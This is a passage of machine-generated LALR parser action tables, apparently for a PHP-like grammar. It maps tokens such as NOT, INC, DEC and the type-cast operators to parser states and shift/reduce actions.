5,336,337,342,343,344,345,346,347,348,351,352,354,355,356,360,361,374,375,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,402,404,407,414,415,416,417,418,419,423,425,426,427,428,429,430,431,432,433,434,437,439,440,441,442,443,444,445,446,449,450,452,453,454,455,456,457,458,459,461,462,463,464,467,468,477,478,479,480,481,482,483,484,485,486,487,488,489,490,494,497,500,501,503,511,524,525,527,528,529,530,531,532,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,600,602,606,607,613,614,616,617,618,619,620,621,622,623
,625,630,634,636,637,638,639,640,646,657,673,674,675,676,677,679,682,685,686,693,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,734,735,736,737,738,740,741,742,743,745,746,748,759,762,763,764,771,773,776,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,811,813,814,817,818,820,822,825,826,832,835,836,839,841,851,854,856,860,861,862,867,868,869,870,871,873,874,875,876,877,878,881,882,883,884,894,900,902,903,904,905,907,908,909,910,911,912,913,914,915,917,918,919,924,926,928,934,935,936,937,938,940,945,951,954,955,962,963,964,967,972,973,975,],[-443,47,-3,-2,-4,-5,-6,47,-50,-362,-443,143,47,47,47,47,47,-47,47,-429,-180,47,-251,-430,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,-344,47,47,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,143,-190,-443,-429,-430,47,47,-23,47,-48,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,-38,143,-40,143,-42,143,143,-443,143,-370,47,47,47,47,47,47,47,47,47,47,47,47,-323,-324,47,-443,-185,-186,-187,-192,-225,-228,-198,47,143,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,143,47,47,143,143,143,143,47,143,-348,-363,47,47,47,-227,47,-228,-349,-8,-443,47,-364,-428,143,-30,-22,-24,-25,-26,47,-11,456,-12,143,-443,-443,-244,-248,47,-250,143,143,143,143,143,143,143,143,143,-297,-298,-299,-300,-301,143,143,-304,143,143,143,143,143,143,143,143,-313,-314,143,47,143,143,143,143,-39,-41,-43,-44,47,-45,456,-46,47,47,-56,143,47,143,143,143,143,143,143,143,143,143,143,143,-183,47,-197,-188,-253,47,47,143,143,-345,143,-443,-352,47,47,-365,-385,-229,47,-366,-230,47,-357,-358,-219,143,143,-7,47,-9,47,-209,47,-28,143,-429,581,-402,456,456,456,-378,-379,-382,-383,-384,-389,-430,456,47,-184,47,-221,-243,-245,143,-238,47,143,47,47,47,47,143,143,-443,47,456,-353,143,-234,-229,47,-189,-443,-230,47,-252,143,
143,-333,-336,-337,-346,-443,143,-361,47,47,143,47,47,143,-218,-235,-236,-240,-10,-29,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,456,-392,-393,581,-380,-390,456,581,-402,-443,-443,47,47,-249,143,-33,-70,-443,143,143,-37,-49,-443,-53,-57,-60,-443,456,-111,-196,143,-191,-194,143,47,47,-205,-223,47,-210,-231,-232,-211,-27,581,581,581,581,581,581,581,581,-411,-412,-413,-414,-415,581,581,-418,581,581,581,581,581,581,581,581,-427,-381,-391,-395,456,456,-365,-366,-386,-443,-62,47,-220,143,47,47,-51,-55,47,456,456,456,-110,-231,-193,-232,143,143,-222,143,-212,-213,47,-214,-215,47,-394,581,-402,581,-31,-64,47,-246,-247,-34,47,-85,47,-443,-443,-443,456,-109,456,-195,-443,456,47,-65,-71,47,-36,-83,-443,143,-443,-92,-93,-86,-87,47,-61,47,47,456,-224,-216,-217,581,143,47,-443,-35,-76,-443,47,-443,47,-88,-54,-108,-271,456,581,456,47,-32,143,47,47,47,581,-63,-84,-443,-443,-77,47,-443,47,-52,47,]),'NOT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,48,-3,-2,-4,-5,-6,48,-50,-443,48,48,48,48,48,-47,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-443,48,48,-23,48,-48,48,48,4
8,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-38,-40,-42,-443,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,-8,-443,48,-30,-22,-24,-25,-26,48,-11,-12,48,48,-39,-41,-43,-44,48,-45,-46,48,48,-56,48,48,48,48,48,48,48,48,-7,48,-9,48,48,-28,48,48,48,48,48,48,48,-443,48,48,48,48,48,48,48,-10,-29,-443,-443,48,48,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,48,48,48,-27,-443,-62,48,48,48,-51,-55,48,-110,48,48,-31,-64,48,-34,48,-85,48,-443,-443,-443,-109,48,-65,-71,48,-36,-83,-443,-443,-92,-93,-86,-87,48,-61,48,48,48,-443,-35,-76,-443,48,-443,48,-88,-54,-108,48,-32,48,48,48,-63,-84,-443,-443,-77,48,-443,48,-52,48,]),'BOOLEAN_NOT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,49,-3,-2,-4,-5,-6,49,-50,-443,49,49,49,49,49,-47,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-443,49,49,-23,49,-48,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-38,-40,-42,-443,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-8,-443,49,-30,-22,-24,-25,-26,49,-11,-12,49,49,-39,-41,-43,-44,49,-45,-46,49,49,-56,49,49,49,
49,49,49,49,49,-7,49,-9,49,49,-28,49,49,49,49,49,49,49,-443,49,49,49,49,49,49,49,-10,-29,-443,-443,49,49,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,49,49,49,-27,-443,-62,49,49,49,-51,-55,49,-110,49,49,-31,-64,49,-34,49,-85,49,-443,-443,-443,-109,49,-65,-71,49,-36,-83,-443,-443,-92,-93,-86,-87,49,-61,49,49,49,-443,-35,-76,-443,49,-443,49,-88,-54,-108,49,-32,49,49,49,-63,-84,-443,-443,-77,49,-443,49,-52,49,]),'INC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,295,301,302,303,304,305,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,418,423,425,428,429,431,432,437,441,442,443,444,445,446,449,477,479,480,481,482,485,487,488,489,490,500,501,525,528,532,549,556,557,559,560,562,563,564,565,566,570,613,614,616,617,618,620,621,622,630,634,636,637,638,639,640,657,679,682,685,686,693,695,698,701,702,703,740,741,742,743,746,748,759,762,763,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,841,856,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,900,902,903,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,50,-3,-2,-4,-5,-6,50,-50,-443,50,50,50,50,50,-47,50,203,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-206,-207,-208,-225,-226,-228,-237,-239,-443,50,50,-23,50,-48,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-38,-40,-42,-443,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-227,50,-228,-8,-443,50,-30,-22,-24,-25,-26,50,-11,-12,-443,-244,-248,50,-250,50,-39,-41,-43,-44,50,-45,-46,50,50,-56,50,50,50,50,-44
3,50,50,-229,50,-230,50,-219,-7,50,-9,50,-209,50,-28,50,50,-221,-243,-245,50,50,50,50,50,-443,50,-234,50,50,-443,50,50,50,50,-218,-235,-236,-240,-10,-29,-443,-443,50,50,-249,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,50,50,-205,-223,50,-210,-231,-232,-211,-27,-443,-62,50,-220,50,50,-51,-55,50,-110,-222,-212,-213,50,-214,-215,50,-31,-64,50,-246,-247,-34,50,-85,50,-443,-443,-443,-109,-443,50,-65,-71,50,-36,-83,-443,-443,-92,-93,-86,-87,50,-61,50,50,-224,-216,-217,50,-443,-35,-76,-443,50,-443,50,-88,-54,-108,50,-32,50,50,50,-63,-84,-443,-443,-77,50,-443,50,-52,50,]),'DEC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,295,301,302,303,304,305,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,418,423,425,428,429,431,432,437,441,442,443,444,445,446,449,477,479,480,481,482,485,487,488,489,490,500,501,525,528,532,549,556,557,559,560,562,563,564,565,566,570,613,614,616,617,618,620,621,622,630,634,636,637,638,639,640,657,679,682,685,686,693,695,698,701,702,703,740,741,742,743,746,748,759,762,763,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,841,856,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,900,902,903,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,51,-3,-2,-4,-5,-6,51,-50,-443,51,51,51,51,51,-47,51,204,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,-206,-207,-208,-225,-226,-228,-237,-239,-443,51,51,-23,51,-48,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,-38,-40,-42,-443,51,51,51,51,51,51,51,51,51,51,51,5
1,51,51,51,51,51,51,51,51,-227,51,-228,-8,-443,51,-30,-22,-24,-25,-26,51,-11,-12,-443,-244,-248,51,-250,51,-39,-41,-43,-44,51,-45,-46,51,51,-56,51,51,51,51,-443,51,51,-229,51,-230,51,-219,-7,51,-9,51,-209,51,-28,51,51,-221,-243,-245,51,51,51,51,51,-443,51,-234,51,51,-443,51,51,51,51,-218,-235,-236,-240,-10,-29,-443,-443,51,51,-249,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,51,51,-205,-223,51,-210,-231,-232,-211,-27,-443,-62,51,-220,51,51,-51,-55,51,-110,-222,-212,-213,51,-214,-215,51,-31,-64,51,-246,-247,-34,51,-85,51,-443,-443,-443,-109,-443,51,-65,-71,51,-36,-83,-443,-443,-92,-93,-86,-87,51,-61,51,51,-224,-216,-217,51,-443,-35,-76,-443,51,-443,51,-88,-54,-108,51,-32,51,51,51,-63,-84,-443,-443,-77,51,-443,51,-52,51,]),'INT_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,52,-3,-2,-4,-5,-6,52,-50,-443,52,52,52,52,52,-47,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-443,52,52,-23,52,-48,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-38,-40,-42,-443,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-8,-443,52,-30,-22,-24,-25,-26,52,-11,-
12,52,52,-39,-41,-43,-44,52,-45,-46,52,52,-56,52,52,52,52,52,52,52,52,-7,52,-9,52,52,-28,52,52,52,52,52,52,52,-443,52,52,52,52,52,52,52,-10,-29,-443,-443,52,52,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,52,52,52,-27,-443,-62,52,52,52,-51,-55,52,-110,52,52,-31,-64,52,-34,52,-85,52,-443,-443,-443,-109,52,-65,-71,52,-36,-83,-443,-443,-92,-93,-86,-87,52,-61,52,52,52,-443,-35,-76,-443,52,-443,52,-88,-54,-108,52,-32,52,52,52,-63,-84,-443,-443,-77,52,-443,52,-52,52,]),'DOUBLE_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,53,-3,-2,-4,-5,-6,53,-50,-443,53,53,53,53,53,-47,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-443,53,53,-23,53,-48,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-38,-40,-42,-443,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-8,-443,53,-30,-22,-24,-25,-26,53,-11,-12,53,53,-39,-41,-43,-44,53,-45,-46,53,53,-56,53,53,53,53,53,53,53,53,-7,53,-9,53,53,-28,53,53,53,53,53,53,53,-443,53,53,53,53,53,53,53,-10,-29,-443,-443,53,53,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,53,53,53,-27,-443,-62,53,53,53,-51,-55,53,-110,53,53
,-31,-64,53,-34,53,-85,53,-443,-443,-443,-109,53,-65,-71,53,-36,-83,-443,-443,-92,-93,-86,-87,53,-61,53,53,53,-443,-35,-76,-443,53,-443,53,-88,-54,-108,53,-32,53,53,53,-63,-84,-443,-443,-77,53,-443,53,-52,53,]),'STRING_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,54,-3,-2,-4,-5,-6,54,-50,-443,54,54,54,54,54,-47,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-443,54,54,-23,54,-48,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-38,-40,-42,-443,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-8,-443,54,-30,-22,-24,-25,-26,54,-11,-12,54,54,-39,-41,-43,-44,54,-45,-46,54,54,-56,54,54,54,54,54,54,54,54,-7,54,-9,54,54,-28,54,54,54,54,54,54,54,-443,54,54,54,54,54,54,54,-10,-29,-443,-443,54,54,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,54,54,54,-27,-443,-62,54,54,54,-51,-55,54,-110,54,54,-31,-64,54,-34,54,-85,54,-443,-443,-443,-109,54,-65,-71,54,-36,-83,-443,-443,-92,-93,-86,-87,54,-61,54,54,54,-443,-35,-76,-443,54,-443,54,-88,-54,-108,54,-32,54,54,54,-63,-84,-443,-443,-77,54,-443,54,-52,54,]),'ARRAY_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,
28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,55,-3,-2,-4,-5,-6,55,-50,-443,55,55,55,55,55,-47,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-443,55,55,-23,55,-48,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-38,-40,-42,-443,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-8,-443,55,-30,-22,-24,-25,-26,55,-11,-12,55,55,-39,-41,-43,-44,55,-45,-46,55,55,-56,55,55,55,55,55,55,55,55,-7,55,-9,55,55,-28,55,55,55,55,55,55,55,-443,55,55,55,55,55,55,55,-10,-29,-443,-443,55,55,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,55,55,55,-27,-443,-62,55,55,55,-51,-55,55,-110,55,55,-31,-64,55,-34,55,-85,55,-443,-443,-443,-109,55,-65,-71,55,-36,-83,-443,-443,-92,-93,-86,-87,55,-61,55,55,55,-443,-35,-76,-443,55,-443,55,-88,-54,-108,55,-32,55,55,55,-63,-84,-443,-443,-77,55,-443,55,-52,55,]),'OBJECT_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197
,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,56,-3,-2,-4,-5,-6,56,-50,-443,56,56,56,56,56,-47,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-443,56,56,-23,56,-48,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-38,-40,-42,-443,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-8,-443,56,-30,-22,-24,-25,-26,56,-11,-12,56,56,-39,-41,-43,-44,56,-45,-46,56,56,-56,56,56,56,56,56,56,56,56,-7,56,-9,56,56,-28,56,56,56,56,56,56,56,-443,56,56,56,56,56,56,56,-10,-29,-443,-443,56,56,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,56,56,56,-27,-443,-62,56,56,56,-51,-55,56,-110,56,56,-31,-64,56,-34,56,-85,56,-443,-443,-443,-109,56,-65,-71,56,-36,-83,-443,-443,-92,-93,-86,-87,56,-61,56,56,56,-443,-35,-76,-443,56,-443,56,-88,-54,-108,56,-32,56,56,56,-63,-84,-443,-443,-77,56,-443,56,-52,56,]),'BOOL_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,5
60,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,57,-3,-2,-4,-5,-6,57,-50,-443,57,57,57,57,57,-47,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-443,57,57,-23,57,-48,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-38,-40,-42,-443,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-8,-443,57,-30,-22,-24,-25,-26,57,-11,-12,57,57,-39,-41,-43,-44,57,-45,-46,57,57,-56,57,57,57,57,57,57,57,57,-7,57,-9,57,57,-28,57,57,57,57,57,57,57,-443,57,57,57,57,57,57,57,-10,-29,-443,-443,57,57,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,57,57,57,-27,-443,-62,57,57,57,-51,-55,57,-110,57,57,-31,-64,57,-34,57,-85,57,-443,-443,-443,-109,57,-65,-71,57,-36,-83,-443,-443,-92,-93,-86,-87,57,-61,57,57,57,-443,-35,-76,-443,57,-443,57,-88,-54,-108,57,-32,57,57,57,-63,-84,-443,-443,-77,57,-443,57,-52,57,]),'UNSET_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,91
2,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,58,-3,-2,-4,-5,-6,58,-50,-443,58,58,58,58,58,-47,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-443,58,58,-23,58,-48,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-38,-40,-42,-443,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-8,-443,58,-30,-22,-24,-25,-26,58,-11,-12,58,58,-39,-41,-43,-44,58,-45,-46,58,58,-56,58,58,58,58,58,58,58,58,-7,58,-9,58,58,-28,58,58,58,58,58,58,58,-443,58,58,58,58,58,58,58,-10,-29,-443,-443,58,58,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,58,58,58,-27,-443,-62,58,58,58,-51,-55,58,-110,58,58,-31,-64,58,-34,58,-85,58,-443,-443,-443,-109,58,-65,-71,58,-36,-83,-443,-443,-92,-93,-86,-87,58,-61,58,58,58,-443,-35,-76,-443,58,-443,58,-88,-54,-108,58,-32,58,58,58,-63,-84,-443,-443,-77,58,-443,58,-52,58,]),'BINARY_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,59,-3,-2,-4,-5,-6,59,-50,-443,59,59,59,59,59,-47,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-443,59,59,-23,59,-48,59,59,59,59,59,59,59,59,59,59,59,59,
